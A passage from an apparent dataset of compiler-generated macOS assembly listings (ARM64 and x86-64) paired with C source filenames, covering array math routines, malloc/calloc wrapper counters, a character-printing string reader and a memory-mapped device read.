movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
setne %al
setp %cl
orb %cl, %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_16: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_17: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
addss (%rax), %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_18: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
subss (%rax), %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_19: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
mulss (%rax), %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_20: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
divss (%rax), %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_21: ## in Loop: Header=BB4_1 Depth=1
movss LCPI4_0(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
addss -12(%rbp), %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_22: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss LCPI4_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero
subss %xmm1, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_23:
jmp LBB4_25
LBB4_24: ## in Loop: Header=BB4_1 Depth=1
movq -8(%rbp), %rax
addq $4, %rax
movq %rax, -8(%rbp)
movq -24(%rbp), %rax
addq $4, %rax
movq %rax, -24(%rbp)
jmp LBB4_1
LBB4_25:
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L4_0_set_3, LBB4_3-LJTI4_0
.set L4_0_set_4, LBB4_4-LJTI4_0
.set L4_0_set_5, LBB4_5-LJTI4_0
.set L4_0_set_6, LBB4_6-LJTI4_0
.set L4_0_set_7, LBB4_7-LJTI4_0
.set L4_0_set_8, LBB4_8-LJTI4_0
.set L4_0_set_9, LBB4_9-LJTI4_0
.set L4_0_set_12, LBB4_12-LJTI4_0
.set L4_0_set_15, LBB4_15-LJTI4_0
.set L4_0_set_23, LBB4_23-LJTI4_0
.set L4_0_set_16, LBB4_16-LJTI4_0
.set L4_0_set_17, LBB4_17-LJTI4_0
.set L4_0_set_18, LBB4_18-LJTI4_0
.set L4_0_set_19, LBB4_19-LJTI4_0
.set L4_0_set_20, LBB4_20-LJTI4_0
.set L4_0_set_21, LBB4_21-LJTI4_0
.set L4_0_set_22, LBB4_22-LJTI4_0
LJTI4_0:
.long L4_0_set_3
.long L4_0_set_4
.long L4_0_set_5
.long L4_0_set_6
.long L4_0_set_7
.long L4_0_set_8
.long L4_0_set_9
.long L4_0_set_12
.long L4_0_set_15
.long L4_0_set_23
.long L4_0_set_23
.long L4_0_set_23
.long L4_0_set_23
.long L4_0_set_23
.long L4_0_set_23
.long L4_0_set_16
.long L4_0_set_17
.long L4_0_set_18
.long L4_0_set_19
.long L4_0_set_20
.long L4_0_set_23
.long L4_0_set_21
.long L4_0_set_22
.end_data_region
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function dArrayMathCA
LCPI5_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _dArrayMathCA
.p2align 4, 0x90
_dArrayMathCA: ## @dArrayMathCA
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %cl, %al
movq %rdi, -8(%rbp)
movsd %xmm0, -16(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
movb %al, -33(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movq %rax, %rcx
addq $-1, %rcx
movq %rcx, -32(%rbp)
cmpq $0, %rax
jbe LBB5_25
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movzbl -33(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -48(%rbp) ## 8-byte Spill
subq $22, %rax
ja LBB5_23
## %bb.26: ## in Loop: Header=BB5_1 Depth=1
movq -48(%rbp), %rax ## 8-byte Reload
leaq LJTI5_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB5_3: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
ucomisd (%rax), %xmm0
sete %al
setnp %cl
andb %cl, %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_4: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
ucomisd (%rax), %xmm0
setne %al
setp %cl
orb %cl, %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_5: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm1 ## xmm1 = mem[0],zero
movq -24(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
seta %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_6: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
ucomisd (%rax), %xmm0
seta %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_7: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm1 ## xmm1 = mem[0],zero
movq -24(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
setae %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_8: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
ucomisd (%rax), %xmm0
setae %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_9: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
xorl %eax, %eax
## kill: def $al killed $al killed $eax
xorps %xmm1, %xmm1
ucomisd %xmm1, %xmm0
movb %al, -49(%rbp) ## 1-byte Spill
jne LBB5_10
jp LBB5_10
jmp LBB5_11
LBB5_10: ## in Loop: Header=BB5_1 Depth=1
movq -24(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
xorps %xmm1, %xmm1
ucomisd %xmm1, %xmm0
setne %al
setp %cl
orb %cl, %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB5_11: ## in Loop: Header=BB5_1 Depth=1
movb -49(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_12: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movb $1, %al
xorps %xmm1, %xmm1
ucomisd %xmm1, %xmm0
movb %al, -50(%rbp) ## 1-byte Spill
jne LBB5_14
jp LBB5_14
## %bb.13: ## in Loop: Header=BB5_1 Depth=1
movq -24(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
xorps %xmm1, %xmm1
ucomisd %xmm1, %xmm0
setne %al
setp %cl
orb %cl, %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB5_14: ## in Loop: Header=BB5_1 Depth=1
movb -50(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_15: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
xorps %xmm1, %xmm1
ucomisd %xmm1, %xmm0
setne %al
setp %cl
orb %cl, %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_16: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_17: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
addsd (%rax), %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_18: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
subsd (%rax), %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_19: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
mulsd (%rax), %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_20: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
divsd (%rax), %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_21: ## in Loop: Header=BB5_1 Depth=1
movsd LCPI5_0(%rip), %xmm0 ## xmm0 = mem[0],zero
addsd -16(%rbp), %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_22: ## in Loop: Header=BB5_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI5_0(%rip), %xmm1 ## xmm1 = mem[0],zero
subsd %xmm1, %xmm0
movq -8(%rbp), %rax
movsd %xmm0, (%rax)
jmp LBB5_24
LBB5_23:
jmp LBB5_25
LBB5_24: ## in Loop: Header=BB5_1 Depth=1
movq -8(%rbp), %rax
addq $8, %rax
movq %rax, -8(%rbp)
movq -24(%rbp), %rax
addq $8, %rax
movq %rax, -24(%rbp)
jmp LBB5_1
LBB5_25:
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L5_0_set_3, LBB5_3-LJTI5_0
.set L5_0_set_4, LBB5_4-LJTI5_0
.set L5_0_set_5, LBB5_5-LJTI5_0
.set L5_0_set_6, LBB5_6-LJTI5_0
.set L5_0_set_7, LBB5_7-LJTI5_0
.set L5_0_set_8, LBB5_8-LJTI5_0
.set L5_0_set_9, LBB5_9-LJTI5_0
.set L5_0_set_12, LBB5_12-LJTI5_0
.set L5_0_set_15, LBB5_15-LJTI5_0
.set L5_0_set_23, LBB5_23-LJTI5_0
.set L5_0_set_16, LBB5_16-LJTI5_0
.set L5_0_set_17, LBB5_17-LJTI5_0
.set L5_0_set_18, LBB5_18-LJTI5_0
.set L5_0_set_19, LBB5_19-LJTI5_0
.set L5_0_set_20, LBB5_20-LJTI5_0
.set L5_0_set_21, LBB5_21-LJTI5_0
.set L5_0_set_22, LBB5_22-LJTI5_0
LJTI5_0:
.long L5_0_set_3
.long L5_0_set_4
.long L5_0_set_5
.long L5_0_set_6
.long L5_0_set_7
.long L5_0_set_8
.long L5_0_set_9
.long L5_0_set_12
.long L5_0_set_15
.long L5_0_set_23
.long L5_0_set_23
.long L5_0_set_23
.long L5_0_set_23
.long L5_0_set_23
.long L5_0_set_23
.long L5_0_set_16
.long L5_0_set_17
.long L5_0_set_18
.long L5_0_set_19
.long L5_0_set_20
.long L5_0_set_23
.long L5_0_set_21
.long L5_0_set_22
.end_data_region
## -- End function
.subsections_via_symbols
| the_stack_data/139414.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
ret
.cfi_endproc
; -- End function
.globl _foo2 ; -- Begin function foo2
.p2align 2
_foo2: ; @foo2
.cfi_startproc
; %bb.0:
ret
.cfi_endproc
; -- End function
.globl ___wrap_calloc ; -- Begin function __wrap_calloc
.p2align 2
___wrap_calloc: ; @__wrap_calloc
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str x1, [sp]
adrp x8, _MainEntered@PAGE
ldr w8, [x8, _MainEntered@PAGEOFF]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
adrp x9, _CallocCalled@PAGE
mov w8, #1
str w8, [x9, _CallocCalled@PAGEOFF]
b LBB2_2
LBB2_2:
ldr x0, [sp, #8]
ldr x1, [sp]
bl ___real_calloc
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl ___wrap_malloc ; -- Begin function __wrap_malloc
.p2align 2
___wrap_malloc: ; @__wrap_malloc
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
adrp x8, _MainEntered@PAGE
ldr w8, [x8, _MainEntered@PAGEOFF]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_2
b LBB3_1
LBB3_1:
adrp x9, _MallocCalled@PAGE
mov w8, #1
str w8, [x9, _MallocCalled@PAGEOFF]
b LBB3_2
LBB3_2:
ldr x0, [sp, #8]
bl ___real_malloc
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _getFP ; -- Begin function getFP
.p2align 2
_getFP: ; @getFP
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
ldr w8, [sp, #12]
mov w10, #2
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
adrp x8, _foo@PAGE
add x8, x8, _foo@PAGEOFF
adrp x9, _FP@GOTPAGE
ldr x9, [x9, _FP@GOTPAGEOFF]
str x8, [x9]
b LBB4_3
LBB4_2:
adrp x9, _FP@GOTPAGE
ldr x9, [x9, _FP@GOTPAGEOFF]
adrp x8, _foo2@PAGE
add x8, x8, _foo2@PAGEOFF
str x8, [x9]
b LBB4_3
LBB4_3:
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x9, _MainEntered@PAGE
mov w8, #1
str w8, [x9, _MainEntered@PAGEOFF]
str wzr, [sp, #8]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
subs w8, w8, #100
cset w8, ge
tbnz w8, #0, LBB5_4
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldr w0, [sp, #8]
bl _getFP
adrp x8, _FP@GOTPAGE
ldr x8, [x8, _FP@GOTPAGEOFF]
ldr x8, [x8]
blr x8
b LBB5_3
LBB5_3: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB5_1
LBB5_4:
adrp x8, _CallocCalled@PAGE
ldr w8, [x8, _CallocCalled@PAGEOFF]
adrp x9, _MallocCalled@PAGE
ldr w9, [x9, _MallocCalled@PAGEOFF]
add w0, w8, w9
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _MainEntered ; @MainEntered
.zerofill __DATA,__common,_MainEntered,4,2
.globl _CallocCalled ; @CallocCalled
.zerofill __DATA,__common,_CallocCalled,4,2
.globl _MallocCalled ; @MallocCalled
.zerofill __DATA,__common,_MallocCalled,4,2
.comm _FP,8,3 ; @FP
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _foo2 ## -- Begin function foo2
.p2align 4, 0x90
_foo2: ## @foo2
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl ___wrap_calloc ## -- Begin function __wrap_calloc
.p2align 4, 0x90
___wrap_calloc: ## @__wrap_calloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
cmpl $0, _MainEntered(%rip)
je LBB2_2
## %bb.1:
movl $1, _CallocCalled(%rip)
LBB2_2:
movq -8(%rbp), %rdi
movq -16(%rbp), %rsi
callq ___real_calloc
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl ___wrap_malloc ## -- Begin function __wrap_malloc
.p2align 4, 0x90
___wrap_malloc: ## @__wrap_malloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
cmpl $0, _MainEntered(%rip)
je LBB3_2
## %bb.1:
movl $1, _MallocCalled(%rip)
LBB3_2:
movq -8(%rbp), %rdi
callq ___real_malloc
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _getFP ## -- Begin function getFP
.p2align 4, 0x90
_getFP: ## @getFP
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl -4(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
cmpl $0, %edx
je LBB4_2
## %bb.1:
movq _FP@GOTPCREL(%rip), %rax
leaq _foo(%rip), %rcx
movq %rcx, (%rax)
jmp LBB4_3
LBB4_2:
movq _FP@GOTPCREL(%rip), %rax
leaq _foo2(%rip), %rcx
movq %rcx, (%rax)
LBB4_3:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl $1, _MainEntered(%rip)
movl $0, -8(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
cmpl $100, -8(%rbp)
jge LBB5_4
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movl -8(%rbp), %edi
callq _getFP
movq _FP@GOTPCREL(%rip), %rcx
movb $0, %al
callq *(%rcx)
## %bb.3: ## in Loop: Header=BB5_1 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB5_1
LBB5_4:
movl _CallocCalled(%rip), %eax
addl _MallocCalled(%rip), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _MainEntered ## @MainEntered
.zerofill __DATA,__common,_MainEntered,4,2
.globl _CallocCalled ## @CallocCalled
.zerofill __DATA,__common,_CallocCalled,4,2
.globl _MallocCalled ## @MallocCalled
.zerofill __DATA,__common,_MallocCalled,4,2
.comm _FP,8,3 ## @FP
.subsections_via_symbols
| the_stack_data/136339.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
mov w0, #0
str wzr, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $0, -4(%rbp)
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/32949712.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x0, #1024
bl _malloc
stur x0, [x29, #-16]
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldur x8, [x29, #-16]
str x8, [sp, #16] ; 8-byte Folded Spill
ldur x0, [x29, #-16]
bl _strlen
mov x8, x0
ldr x0, [sp, #16] ; 8-byte Folded Reload
add x1, x8, #1
bl _realloc
stur x0, [x29, #-16]
stur wzr, [x29, #-20]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-16]
ldursw x9, [x29, #-20]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-16]
ldursw x9, [x29, #-20]
ldrsb w8, [x8, x9]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-16]
ldursw x9, [x29, #-20]
ldrsb w10, [x8, x9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_5
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB0_1
LBB0_7:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%[^\n]"
l_.str.1: ; @.str.1
.asciz "%c"
l_.str.2: ; @.str.2
.asciz "\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl $1024, %edi ## imm = 0x400
callq _malloc
movq %rax, -16(%rbp)
movq -16(%rbp), %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _scanf
movq -16(%rbp), %rax
movq %rax, -32(%rbp) ## 8-byte Spill
movq -16(%rbp), %rdi
callq _strlen
movq -32(%rbp), %rdi ## 8-byte Reload
movq %rax, %rsi
addq $1, %rsi
callq _realloc
movq %rax, -16(%rbp)
movl $0, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
je LBB0_7
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $32, %eax
je LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_5
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_6
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_1
LBB0_7:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%[^\n]"
L_.str.1: ## @.str.1
.asciz "%c"
L_.str.2: ## @.str.2
.asciz "\n"
.subsections_via_symbols
| the_stack_data/1123309.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/225142836.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _read_dev ; -- Begin function read_dev
.p2align 2
_read_dev: ; @read_dev
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #8]
ldr w8, [sp, #8]
mov x9, x8
mov x8, #4
movk x8, #65535, lsl #16
add x8, x8, x9, lsl #2
str x8, [sp]
ldr w8, [sp, #8]
subs w8, w8, #4
cset w8, lo
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
mov w8, #65535
str w8, [sp, #12]
b LBB0_8
LBB0_2:
b LBB0_3
LBB0_3: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
ldrh w8, [x8]
ands w8, w8, #0x3
cset w8, ne
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
b LBB0_3
LBB0_5:
ldr x8, [sp]
ldrh w8, [x8]
ands w8, w8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
ldr x9, [sp]
mov w8, #4
strh w8, [x9]
mov w8, #65535
str w8, [sp, #12]
b LBB0_8
LBB0_7:
ldr x8, [sp]
ldrb w8, [x8, #2]
str w8, [sp, #12]
b LBB0_8
LBB0_8:
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _read_dev ## -- Begin function read_dev
.p2align 4, 0x90
_read_dev: ## @read_dev
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -8(%rbp)
movl -8(%rbp), %eax
movl %eax, %ecx
movl $4294901764, %eax ## imm = 0xFFFF0004
shlq $2, %rcx
addq %rcx, %rax
movq %rax, -16(%rbp)
cmpl $4, -8(%rbp)
jb LBB0_2
## %bb.1:
movl $65535, -4(%rbp) ## imm = 0xFFFF
jmp LBB0_8
LBB0_2:
jmp LBB0_3
LBB0_3: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
